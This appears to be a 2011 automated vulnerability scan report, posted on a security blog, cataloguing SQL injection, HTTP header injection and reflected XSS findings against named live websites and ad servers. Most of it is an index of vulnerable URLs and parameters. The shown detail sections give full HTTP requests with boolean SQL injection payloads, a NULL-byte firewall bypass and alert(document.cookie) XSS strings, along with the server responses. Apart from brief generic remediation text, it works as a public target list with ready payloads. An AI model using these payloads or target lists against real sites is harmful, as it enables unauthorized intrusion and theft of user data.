XSS, DORK, Cross Site Scripting, SQL Injection, HTTP Header Injection, Response Splitting, 2-22-2011

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX Research Blog at Tue Mar 01 08:34:14 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://isp.thelist.com/ [__utmb cookie]

1.2. http://segment-pixel.invitemedia.com/pixel [clientID parameter]

1.3. http://virtacore.com/vcloud_express.cfm [rxtype parameter]

1.4. http://www.intranetjournal.com/ [__utmz cookie]

1.5. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]

1.6. http://www.intranetjournal.com/ [intmintc__welcome; toURL cookie]

1.7. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

1.8. http://www.isp-planet.com/resources/directories/state_puc.html [qsg cookie]

1.9. http://www.isp-planet.com/services/merchants/index.html [intmintc__welcome cookie]

1.10. http://www.isp-planet.com/services/registrars/chart.html [qsg cookie]

1.11. http://www.isp-planet.com/services/voip_wholesalers/chart.html [__utma cookie]

1.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

1.13. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

1.14. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

1.15. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

1.16. http://www.phpbuilder.com/ [QUADIDX cookie]

2. HTTP header injection

2.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

2.2. http://j.jioet.com/cgi/r [;n parameter]

2.3. http://j.jioet.com/cgi/r [InternalReferralURL parameter]

2.4. http://j.jioet.com/cgi/r [LeadSiteURL parameter]

2.5. http://j.jioet.com/cgi/r [css parameter]

2.6. http://j.jioet.com/cgi/r [ctnum parameter]

2.7. http://j.jioet.com/cgi/r [fc parameter]

2.8. http://j.jioet.com/cgi/r [ff parameter]

2.9. http://j.jioet.com/cgi/r [ft parameter]

2.10. http://j.jioet.com/cgi/r [hidepriv parameter]

2.11. http://j.jioet.com/cgi/r [name of an arbitrarily supplied request parameter]

2.12. http://j.jioet.com/cgi/r [qset parameter]

2.13. http://j.jioet.com/cgi/r [sdw parameter]

2.14. http://j.jioet.com/cgi/r [segid parameter]

2.15. http://j.jioet.com/cgi/r [sp parameter]

2.16. http://j.jioet.com/cgi/r [spage parameter]

2.17. http://j.jioet.com/cgi/r [tnum parameter]

2.18. http://j.jioet.com/cgi/r [typage parameter]

2.19. http://j.jioet.com/cgi/r [vkey parameter]

2.20. http://member.internet.com/register [REST URL parameter 1]

2.21. http://o1.qnsr.com//cgi/c [a parameter]

2.22. http://o1.qnsr.com//cgi/c [name of an arbitrarily supplied request parameter]

2.23. http://o1.qnsr.com/cgi/r [&exp parameter]

2.24. http://o1.qnsr.com/cgi/r [;n parameter]

2.25. http://o1.qnsr.com/cgi/r [CCID parameter]

2.26. http://o1.qnsr.com/cgi/r [CLK parameter]

2.27. http://o1.qnsr.com/cgi/r [QTR parameter]

2.28. http://o1.qnsr.com/cgi/r [name of an arbitrarily supplied request parameter]

2.29. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.30. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.31. http://www.thelist.com/pppclicks.php [name of an arbitrarily supplied request parameter]

2.32. http://www.thelist.com/pppclicks.php [target parameter]

3. Cross-site scripting (reflected)

3.1. http://aserve.directorym.com/ModuleG.aspx [dm_affiliate parameter]

3.2. http://aserve.directorym.com/ModuleG.aspx [dm_link_url parameter]

3.3. http://aserve.directorym.com/ModuleG.aspx [dm_set_regionlist parameter]

3.4. http://flash.quantserve.com/quant.swf [lc parameter]

3.5. http://forms.vendorseek.com/controller [&CCID parameter]

3.6. http://forms.vendorseek.com/controller [&exp parameter]

3.7. http://forms.vendorseek.com/controller [CCID parameter]

3.8. http://forms.vendorseek.com/controller [CLK parameter]

3.9. http://forms.vendorseek.com/controller [InternalReferralURL parameter]

3.10. http://forms.vendorseek.com/controller [LeadSiteURL parameter]

3.11. http://forms.vendorseek.com/controller [QTR parameter]

3.12. http://forms.vendorseek.com/controller [css parameter]

3.13. http://forms.vendorseek.com/controller [ctnum parameter]

3.14. http://forms.vendorseek.com/controller [fc parameter]

3.15. http://forms.vendorseek.com/controller [ff parameter]

3.16. http://forms.vendorseek.com/controller [ft parameter]

3.17. http://forms.vendorseek.com/controller [hidepriv parameter]

3.18. http://forms.vendorseek.com/controller [name of an arbitrarily supplied request parameter]

3.19. http://forms.vendorseek.com/controller [sdw parameter]

3.20. http://forms.vendorseek.com/controller [segid parameter]

3.21. http://forms.vendorseek.com/controller [sp parameter]

3.22. http://forms.vendorseek.com/controller [spage parameter]

3.23. http://forms.vendorseek.com/controller [tnum parameter]

3.24. http://forms.vendorseek.com/controller [typage parameter]

3.25. http://forms.vendorseek.com/controller [vkey parameter]

3.26. http://image.providesupport.com/cmd/virtacore [REST URL parameter 1]

3.27. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 1]

3.28. http://image.providesupport.com/js/virtacore/safe-monitor.js [REST URL parameter 2]

3.29. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpck parameter]

3.30. http://img.mediaplex.com/content/0/12309/121202/1331390_Dell_MobilityChallenge_160x600_AS.js [mpvc parameter]

3.31. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpck parameter]

3.32. http://img.mediaplex.com/content/0/12309/121202/1331391_Dell_MobilityChallenge_300x250_AS.js [mpvc parameter]

3.33. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpck parameter]

3.34. http://img.mediaplex.com/content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js [mpvc parameter]

3.35. http://intranetjournal.us.intellitxt.com/al.asp [jscallback parameter]

3.36. http://intranetjournal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.37. http://intranetjournal.us.intellitxt.com/v4/advert [jscallback parameter]

3.38. http://intranetjournal.us.intellitxt.com/v4/context [jscallback parameter]

3.39. http://intranetjournal.us.intellitxt.com/v4/init [jscallback parameter]

3.40. http://intranetjournal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.41. http://isp-planet.us.intellitxt.com/al.asp [jscallback parameter]

3.42. http://isp-planet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.43. http://isp-planet.us.intellitxt.com/v4/context [jscallback parameter]

3.44. http://isp-planet.us.intellitxt.com/v4/init [jscallback parameter]

3.45. http://isp-planet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.46. http://isp.thelist.com/ [name of an arbitrarily supplied request parameter]

3.47. http://jlinks.industrybrains.com/jsct [ct parameter]

3.48. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

3.49. http://jlinks.industrybrains.com/jsct [tr parameter]

3.50. http://js.revsci.net/gateway/gw.js [csid parameter]

3.51. http://kona5.kontera.com/KonaGet.js [l parameter]

3.52. http://kona5.kontera.com/KonaGet.js [rId parameter]

3.53. http://member.internet.com/cookie_class.php [REST URL parameter 1]

3.54. http://member.internet.com/favicon.ico [REST URL parameter 1]

3.55. http://pdastreet.us.intellitxt.com/al.asp [jscallback parameter]

3.56. http://pdastreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.57. http://pdastreet.us.intellitxt.com/v4/advert [jscallback parameter]

3.58. http://pdastreet.us.intellitxt.com/v4/context [jscallback parameter]

3.59. http://pdastreet.us.intellitxt.com/v4/init [jscallback parameter]

3.60. http://pdastreet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.61. http://smartphonetoday.us.intellitxt.com/al.asp [jscallback parameter]

3.62. http://smartphonetoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.63. http://smartphonetoday.us.intellitxt.com/v4/advert [jscallback parameter]

3.64. http://smartphonetoday.us.intellitxt.com/v4/context [jscallback parameter]

3.65. http://smartphonetoday.us.intellitxt.com/v4/init [jscallback parameter]

3.66. http://smartphonetoday.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.67. http://vbforums.us.intellitxt.com/al.asp [jscallback parameter]

3.68. http://vbforums.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.69. http://vbforums.us.intellitxt.com/v4/advert [jscallback parameter]

3.70. http://vbforums.us.intellitxt.com/v4/context [jscallback parameter]

3.71. http://vbforums.us.intellitxt.com/v4/init [jscallback parameter]

3.72. http://vbforums.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.73. http://virtacore.com/ [name of an arbitrarily supplied request parameter]

3.74. http://virtacore.com/vcloud_express.cfm [rxtype parameter]

3.75. http://www.internet.com/developer [name of an arbitrarily supplied request parameter]

3.76. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]

3.77. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]

3.78. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

3.79. http://www.isp-planet.com/business/associations/index.html [name of an arbitrarily supplied request parameter]

3.80. http://www.isp-planet.com/fixed_wireless/equipment/distributors/index.html [name of an arbitrarily supplied request parameter]

3.81. http://www.isp-planet.com/investor/brokers/chart.html [name of an arbitrarily supplied request parameter]

3.82. http://www.isp-planet.com/investor/brokers/index.html [name of an arbitrarily supplied request parameter]

3.83. http://www.isp-planet.com/marketing/index.html [name of an arbitrarily supplied request parameter]

3.84. http://www.isp-planet.com/quotes/index.html [name of an arbitrarily supplied request parameter]

3.85. http://www.isp-planet.com/resources/backbones/index.html [name of an arbitrarily supplied request parameter]

3.86. http://www.isp-planet.com/resources/directories/state_puc.html [name of an arbitrarily supplied request parameter]

3.87. http://www.isp-planet.com/resources/how_to/index.html [name of an arbitrarily supplied request parameter]

3.88. http://www.isp-planet.com/resources/index.html [name of an arbitrarily supplied request parameter]

3.89. http://www.isp-planet.com/resources/index_lawyer.html [name of an arbitrarily supplied request parameter]

3.90. http://www.isp-planet.com/resources/isp_guide/index.html [name of an arbitrarily supplied request parameter]

3.91. http://www.isp-planet.com/services/asguide/index.html [name of an arbitrarily supplied request parameter]

3.92. http://www.isp-planet.com/services/billing/chart.html [name of an arbitrarily supplied request parameter]

3.93. http://www.isp-planet.com/services/billing/index.html [name of an arbitrarily supplied request parameter]

3.94. http://www.isp-planet.com/services/custsupport/chart.html [name of an arbitrarily supplied request parameter]

3.95. http://www.isp-planet.com/services/custsupport/index.html [name of an arbitrarily supplied request parameter]

3.96. http://www.isp-planet.com/services/ids/chart.html [name of an arbitrarily supplied request parameter]

3.97. http://www.isp-planet.com/services/ids/index.html [name of an arbitrarily supplied request parameter]

3.98. http://www.isp-planet.com/services/merchants/index.html [name of an arbitrarily supplied request parameter]

3.99. http://www.isp-planet.com/services/registrars/chart.html [name of an arbitrarily supplied request parameter]

3.100. http://www.isp-planet.com/services/registrars/index.html [name of an arbitrarily supplied request parameter]

3.101. http://www.isp-planet.com/services/trouble_ticket/chart.html [name of an arbitrarily supplied request parameter]

3.102. http://www.isp-planet.com/services/trouble_ticket/index.html [name of an arbitrarily supplied request parameter]

3.103. http://www.isp-planet.com/services/voip_wholesalers/chart.html [name of an arbitrarily supplied request parameter]

3.104. http://www.isp-planet.com/services/voip_wholesalers/index.html [name of an arbitrarily supplied request parameter]

3.105. http://www.isp-planet.com/services/webmail/index.html [name of an arbitrarily supplied request parameter]

3.106. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]

3.107. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]

3.108. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

3.109. http://www.palmblvd.com/ [e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f parameter]

3.110. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]

3.111. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]

3.112. http://www.phpbuilder.com/ [7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 parameter]

3.113. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

3.114. http://www.phpbuilder.com/favicon.ico [REST URL parameter 1]

3.115. http://www.phpbuilder.com/welcomead/ [REST URL parameter 1]

3.116. http://www.smartphonetoday.com/ [10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 parameter]

3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]

3.118. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]

3.119. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]

3.120. http://www.thelist.com/HTML/5/2349355.html [name of an arbitrarily supplied request parameter]

3.121. http://www.thelist.com/HTML/7/2331187.html [name of an arbitrarily supplied request parameter]

3.122. http://www.thelist.com/add.php [name of an arbitrarily supplied request parameter]

3.123. http://www.thelist.com/areacode.html [name of an arbitrarily supplied request parameter]

3.124. http://www.thelist.com/countrycode.html [name of an arbitrarily supplied request parameter]

3.125. http://www.thelist.com/index.html [name of an arbitrarily supplied request parameter]

3.126. http://www.thelist.com/misc/canada/ [name of an arbitrarily supplied request parameter]

3.127. http://www.thelist.com/misc/usa/ [name of an arbitrarily supplied request parameter]

3.128. http://www.thelist.com/update.php [name of an arbitrarily supplied request parameter]

3.129. http://www.vbforums.com/ [86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6 parameter]

3.130. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]

3.131. http://www.vibrantmedia.com/whatisIntelliTXT.asp [ipid parameter]

3.132. http://www.virtacore.com/ [name of an arbitrarily supplied request parameter]

3.133. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]

3.134. http://www.internet.com/sections/asp.html [User-Agent HTTP header]

3.135. http://www.internet.com/sections/win.html [User-Agent HTTP header]

3.136. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header]

3.137. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

3.138. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

3.139. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

3.140. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

3.141. http://image.providesupport.com/js/virtacore/safe-monitor.js [vsid cookie]

3.142. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]

3.143. http://www.internet.com/ebook [name of an arbitrarily supplied request parameter]



1. SQL injection  next
There are 16 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://isp.thelist.com/ [__utmb cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://isp.thelist.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 15904219'%20or%201%3d1--%20 and 15904219'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: isp.thelist.com
Proxy-Connection: keep-alive
Referer: http://www.thelist.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.129803325115904219'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:28 GMT
Content-Type: text/html
Content-Length: 45853

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=2960823;u=j;z=20110218074828" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=2960823;u=j;z=20110218074828" alt="Click here"></a>
</noscript>
</div>
</TD>
</tr>
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366"><a href="/index.html"><img src="/img/isp-list1.gif" width="175" height="85" border="0" alt="The List of ISPs"></a></TD>
<TD width="375" bgcolor="003366" align="center"><img src="/img/space.gif" width="375" height="2" border="0"><br><font face="helvetica, arial, verdana" size="-1" color="ffffff">Search by:<br><a href="/areacode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Area Code</font></a>&nbsp;|&nbsp;<a href="/countrycode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Country Code</font></a>&nbsp;|&nbsp;<a href="/misc/usa/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">U.S. Nationwide</font></a>&nbsp;|&nbsp;<a href="/misc/canada/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Canada Nationwide</font></a></font></td>
<TD width="200" background="/img/topright-no-search.gif" valign="top" align="center">
<img src="/img/space.gif" width="200" height="5" border="0"><br>


<!-- sitetext-1: Missing QUAD ads for page_type: index on path www.thelist.com with position S1
url: / --><span class='quad_S1'></div>

<br>
   <font face="helvetica, arial, verdana" size="-2" color="ffffff"><b>Search: </b></font>
   <INPUT TYPE="HIDDEN" name="IC_StartNumber" value="0">
   <INPUT TYPE="HIDDEN" name="IC_BatchSize" value="10">
   <INPUT TYPE="HIDDEN" name="IC_RelevanceThreshold" value="50">
   <INPUT TYPE="HIDDEN" NAME="IC_QueryDatabase" VALUE="TheList">
   <INPUT TYPE="text" NAME="IC_QueryText" SIZE="10">
   <input type="image" name="Submit" value="Find" src="http://isps.thelist.com/img/findbuttonred.gif" ALIGN="ABSMIDDLE"
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: isp.thelist.com
Proxy-Connection: keep-alive
Referer: http://www.thelist.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.129803325115904219'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:26 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:26 GMT
Content-Type: text/html
Content-Length: 45863

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=1230773098;u=j;z=20110218074826" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695854/630909/582108/581034;s=9544;x=3584;f=1230773098;u=j;z=20110218074826" alt="Click here"></a>
</noscript>
</div>
</TD>
</tr>
<TR><FORM METHOD="POST" ACTION="http://search.internet.com/isps.thelist.com">
<TD width="175" valign="bottom" bgcolor="003366"><a href="/index.html"><img src="/img/isp-list1.gif" width="175" height="85" border="0" alt="The List of ISPs"></a></TD>
<TD width="375" bgcolor="003366" align="center"><img src="/img/space.gif" width="375" height="2" border="0"><br><font face="helvetica, arial, verdana" size="-1" color="ffffff">Search by:<br><a href="/areacode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Area Code</font></a>&nbsp;|&nbsp;<a href="/countrycode.html"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Country Code</font></a>&nbsp;|&nbsp;<a href="/misc/usa/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">U.S. Nationwide</font></a>&nbsp;|&nbsp;<a href="/misc/canada/"><font face="helvetica, arial, verdana" size="-2" color="ffffff">Canada Nationwide</font></a></font></td>
<TD width="200" background="/img/topright-no-search.gif" valign="top" align="center">
<img src="/img/space.gif" width="200" height="5" border="0"><br>


<!-- sitetext-1: Missing QUAD ads for page_type: index on path www.thelist.com with position S1
url: / --><span class='quad_S1'></div>

<br>
   <font face="helvetica, arial, verdana" size="-2" color="ffffff"><b>Search: </b></font>
   <INPUT TYPE="HIDDEN" name="IC_StartNumber" value="0">
   <INPUT TYPE="HIDDEN" name="IC_BatchSize" value="10">
   <INPUT TYPE="HIDDEN" name="IC_RelevanceThreshold" value="50">
   <INPUT TYPE="HIDDEN" NAME="IC_QueryDatabase" VALUE="TheList">
   <INPUT TYPE="text" NAME="IC_QueryText" SIZE="10">
   <input type="image" name="Submit" value="Find" src="http://isps.thelist.com/img/findbuttonred.gif" ALIGN="ABSM
...[SNIP]...

1.2. http://segment-pixel.invitemedia.com/pixel [clientID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The clientID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the clientID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=24197&partnerID=12&clientID=3815%00'&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.internet.com/developer?2d7d7%3Cscript%3Ealert(document.cookie)%3C/script%3Ea487c4b6236=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; exchange_uid=eyI0IjogWyJFMCIsIDczNDE4M119; segments_p1="eJzjYuY4ycHFxfFxG5PA5VlXX7NwMXP84+Bi4Xh5kBEAdk8IyQ=="

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=24197&partnerID=12&clientID=3815%00''&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.internet.com/developer?2d7d7%3Cscript%3Ealert(document.cookie)%3C/script%3Ea487c4b6236=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; exchange_uid=eyI0IjogWyJFMCIsIDczNDE4M119; segments_p1="eJzjYuY4ycHFxfFxG5PA5VlXX7NwMXP84+Bi4Xh5kBEAdk8IyQ=="

Response 2

HTTP/1.0 302 Found
Server: IM BidManager
Date: Fri, 18 Feb 2011 16:55:10 GMT
Expires: Fri, 18-Feb-2011 16:54:50 GMT
Location: http://ad.yieldmanager.com/pixel?id=1172643&t=2
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/plain
Set-Cookie: segments_p1=eJzjYuY4ycHFwvHyICOQbN3LyMXM8Y+Di4vj4zYmgcuzrr5mAQCN0woi; Domain=invitemedia.com; expires=Sat, 18-Feb-2012 16:55:10 GMT; Path=/


1.3. http://virtacore.com/vcloud_express.cfm [rxtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://virtacore.com
Path:   /vcloud_express.cfm

Issue detail

The rxtype parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rxtype parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /vcloud_express.cfm?rxtype=15:2:0:leftcontent;billboard;other_content;'&ts=1297999477134-11130790-98617796 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Referer: http://virtacore.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22208188.27686095.1297999341.1297999341.1297999341.1; __utmb=22208188; __utmc=22208188; __utmz=22208188.1297999341.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=11130852; CFTOKEN=57982461

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:24:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


   {history:false, tid:1, sid:0, title:'Page Error',onload:function(){oModeless('error','<h1 class=title>We apologize, however there was an error with your request.</h1>/vcloud_express.cfm?rxtype=15
...[SNIP]...
<td>\r\n\t\t\t\t\tjava.sql.SQLException: [Macromedia][SQLServer JDBC Driver]Invalid parameter binding(s).\n\tat macromedia.jdbc.base.BaseExceptions.createException(Unknown Source)\n\tat macromedia.jdbc.base.BaseExceptions.getException(Unkno
...[SNIP]...

Request 2

GET /vcloud_express.cfm?rxtype=15:2:0:leftcontent;billboard;other_content;''&ts=1297999477134-11130790-98617796 HTTP/1.1
Host: virtacore.com
Proxy-Connection: keep-alive
Referer: http://virtacore.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22208188.27686095.1297999341.1297999341.1297999341.1; __utmb=22208188; __utmc=22208188; __utmz=22208188.1297999341.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=11130852; CFTOKEN=57982461

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 03:24:31 GMT
Server: Microsoft-IIS/6.0
